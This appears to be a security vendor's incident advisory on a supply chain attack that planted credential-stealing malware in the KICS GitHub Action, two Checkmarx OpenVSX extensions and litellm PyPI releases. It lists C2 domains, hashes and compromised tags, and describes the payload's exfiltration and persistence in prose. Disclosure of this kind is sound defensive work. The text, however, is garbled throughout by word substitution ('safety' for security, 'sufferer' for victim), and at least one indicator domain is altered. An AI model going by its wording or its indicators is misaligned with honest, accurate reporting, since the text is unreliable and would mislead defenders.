KICS GitHub Action Compromised: TeamPCP Supply Chain Attack
The KICS GitHub Action was compromised with credential-stealing malware by TeamPCP, the identical group behind the Trivy attack. KICS is an open supply infrastructure as code safety scanner by Checkmarx. Between 12:58 and 16:50 UTC on March twenty thirdany customers of this GitHub Action who have been pinning to one of many compromised tags would have been served the malware. The repository was taken down at 16:50 UTC, shortly after a GitHub issue was filed by a user notifying the maintainers of the incident.
The motion was out there at https://github.com/Checkmarx/kics-github-action previous to takedown.
Update 03/24:
11:30 UTC: The “litellm” packages (variations 1.82.7 and 1.82.8) on PyPI have been trojanized. They comprise with the identical performance because the earlier operation, however utilizing a brand new exfiltration area: fashions.litellm[.]cloud. The malicious replace was revealed at roughly 8:30 UTC and was quarantined by PyPI at 11:25 UTC. Wiz clients can see an advisory within the Threat Center.
Updates 03/23:
19:24 UTC: The repository has been reinstated, and the maintainers state “The issue is resolved now“
22:25 UTC: Sysdig stories that ast-github-action was additionally impacted. They have been restricted to observing a single malicious tag 2.3.28 – However primarily based on TeamPCPs techniques, we imagine it’s seemingly all tags have been impacted.
22:35 UTC: Based on a tip from impartial researcher Adnan Khan, Wiz has confirmed that Checkmarx OpenVSX extensions cx-dev-assist 1.7.0 and ast-results 2.53.0 have been compromised. This was concurrently reported by ReversingLabs via tweet. See “OpenVSX Payload” part under for particulars. We have reported these to OpenVSX for removing.
Update 03/24 9:00 UTC: Checkmarx have revealed to Security Update addressing the problems with the KICS GitHub motion and OpenVSX plugins. They state a decision time of 15:41 UTC for OpenVSXnevertheless we noticed the malicious variations have been current on the time of our report. Additionally, whereas new variations have been pushed, the malicious variations have but to be eliminated.
This is the second common open supply safety scanner that this group has dedicated to within the final 5 days. The operation makes use of acquainted naming conventions and the identical RSA public key, permitting Wiz to evaluate with excessive confidence that it’s the identical actor.
KICS Github Action Payload
The malicious code was injected in the identical method because the Trivy incident:
The attacker staged imposter commits (commits on a fork of the repository) containing their payload:
setup.shThe attacker then used what seems to be a compromised identification to instantly replace all 35 tags within the undertaking and level them to these staged commits
The malware additionally capabilities equally, however with just a few key variations:
This model makes use of a brand new C2 area:
checkmarx.zone.The new model creates a
docs-tpcprepository through the sufferer’sGITHUB_TOKENs as a fallback to C2 disruption. In the Trivy incident,tpcp-docswas used as an alternative.This model provides Kubernetes centered persistence code, along with the prevailing credential stealing and exfiltration code.
While kics-github-action has ~1% of the seen public utilization of trivy-actionit’s nonetheless broadly adopted publicly and privately as an Infrastructure as Code safety scanner.
We will replace this submit with additional evaluation.
Github Commit
The assault seems to have been completed through the compromise of the cx-plugins-releases (GitHub ID 225848595) service account, as that’s the identification concerned in publishing the malicious tags.
OpenVSX Payload
Both dedicated extensions (ast-results v2.53.0 and cx-dev-assist v1.7.0) contained equivalent payloads. They have been revealed 12 seconds aside at 12:53 UTC on March 23, 2026, through the ast-phoenix account on Open VSX. The VS Code Marketplace variations seem unaffected.
Payload Execution Flow
On activation of the extension, the brand new malicious
environmentAuthChecker.jsis invoked fromactivateCore.jsThis payload first checks if the sufferer has credentials for a minimum of one cloud supplier
If any credentials are detected, the second-stage payload is retrieved from the C2: checkmarx[.]zone/static/checkmarx-util-1.0.4.tgz
The payload makes an attempt execution through npx, bunx, pnpx, or yarn dlx. This covers main JavaScript package deal managers. The retrieved package deal contrains a complete credential stealer.
Harvested credentials are then encrpyted, utilizing the keys as elsewhere on this marketing campaign, and exfiltrated to
checkmarx[.]zone/vsxacetpcp.tar.gz.
On non-CI programs, the malware installs persistence through a systemd person service. The persistence script polls https://checkmarx[.]zone/raw each 50 minutes for extra payloads, with a kill swap that aborts if the response incorporates “youtube”. Currently, the hyperlink redirects to The Show Must Go On by Queen.
Compromised Artifacts
OpenVSX Extensions
| Artifact | SHA256 |
|---|---|
| ast-results-2.53.0.vsix | 65bd72fcddaf938cefdf55b3323ad29f649a65d4ddd6aea09afa974dfc7f105d |
| cx-dev-assist-1.7.0.vsix | 744c9d61b66bcd2bb5474d9afeee6c00bb7e0cd32535781da188b80eb59383e0 |
| checkmarx-util-1.0.4.tgz | 0d66d8c7e02574ff0d3443de0585af19c903d12466d88573ed82ec788655975c |
| environmentAuthChecker.js | 527f795a201a6bc114394c4cfd1c74dce97381989f51a4661aafbc93a4439e90 |
kics-github-action Releases
The v1.1 release was the one malicious launch created. Other releases, triggered routinely by the tag occasions, failed as a result of these variations already existed.
kics-github-action Tags
| Tag | Commit SHA |
|---|---|
| v1 | 0e22ec8d1e0dda3c62bf4beffcd4a8a5db1abda1 |
| v1.0 | 45f3749467a6017cb4fb749054b498d149dd5924 |
| v1.1 | 8e20c7a67bb95632e2040327a355fb97e6014d29 |
| v1.2 | 93de85c910d859b759cf9185aa78d5a23a4b7000 |
| v1.3 | 0e7343ba084735863db92b6f8ba2fa9dee604f7c |
| v1.4 | 2dc0fa613f6f4c15f26ad98225ad253475681616 |
| v1.5 | f00191dd3352c0cd83c6cce4e6bf04b628214dd0 |
| v1.6 | e0359b1a253ee66c8018586c3225e6e9cd2d8a4f |
| v1.6.1 | dc6dbf358998c0c64da83edc8fcd581c12656b19 |
| v1.6.2 | 08b9ea97eb292d5e1f9ac2d8e21c0ba32f0fdff0 |
| v1.6.3 | 005fb0837553de722f8bf11d98e905dbdde19861 |
| v1.7.0 | a5471d37c656ecd4560e8e0b3977910f27025618 |
| v2 | 3d49875ed47c6b8b4c8b50e0421418cf6b9f35f4 |
| v2.0.0 | 121c38fb49c9fc82160245fb6e2a9119db636e4d |
| v2.1.0 | 1e9eeaba37fe0032deba133f598e74dab0ceb3b7 |
| v2.1.1 | c5c07508527fc6a125855eebfb533e64f675bd8e |
| v2.1.2 | c999dbb9cc904e23675f9929f7e0e51d132879cf |
| v2.1.3 | 4ebf62dd8ff318412b38d19841fc3c8650e294bf |
| v2.1.4 | 3ae9f0d6f8139964635d411149f9b3e0a6eb935e |
| v2.1.5 | 96a0e8eb31c3cce6c495c9a49dd49c881cd17934 |
| v2.1.6 | 31fbf5831a2e52429738fdc0cbaa20e57872b6fc |
| v2.1.7 | fca3a20afcb8ec7f9932c060a236d2a9021fdd2b |
| v2.1.8 | 0f81f132f9f09bb4976d403914a44a1a1eb6158d |
| v2.1.9 | c0e23718a5074f3b8ad286f37b532e02057af35f |
| v2.1.10 | d66f0657133bc42f8264458063999bf1910490db |
| v2.1.11 | e35c9d6a5faffc1c5b3450d0bf09006aa9b9e906 |
| v2.1.12 | 2eee333d70fb6e14ce1d4aa73f12058bc5d70193 |
| v2.1.13 | f9641eb512f5c6530d13275903e8a97baf0925f1 |
| v2.1.14 | e8754eebc822b5122e96a6142b28dbc0e179c91c |
| v2.1.15 | 69b3f020390222a9fcb6029ba56533b2fb12f103 |
| v2.1.16 | db942a0dd7e9d1aeac72bc675bdb67f39a688b63 |
| v2.1.17 | 208813bf5feca5df9a935363cd426bc914614d0b |
| v2.1.18 | 3fdeadb81fbeddc1453163cc87bc173911fd47e2 |
| v2.1.19 | 310734c0ffd29438f6195a24e2cbbacfdc33c9ab |
| v2.1.20 | b974e53df1e3a2cd22ea90f0ec01882394feede4 |
What actions ought to safety groups take?
Audit KICS GitHub Actions references: Review workflows utilizing
kics-github-action. If you referenced a model tag fairly than a SHA, test workflow run logs from the publicity window for indicators of compromise.Search for exfiltration artifacts: Look for repositories named
docs-tpcpin your GitHub group, which can point out profitable exfiltration through the fallback mechanism.
Long-term hardening: Refer to Wiz’s How to Harden GitHub Actions: The Unofficial Guide
How can Wiz assist?
Wiz clients ought to proceed to observe the advisory within the Wiz Threat Center for ongoing steerage, pre-built queries, and references to related detections they’ll use to evaluate the danger of their atmosphere.
Worried you have been impacted? Connect with the Wiz Incident Response team.
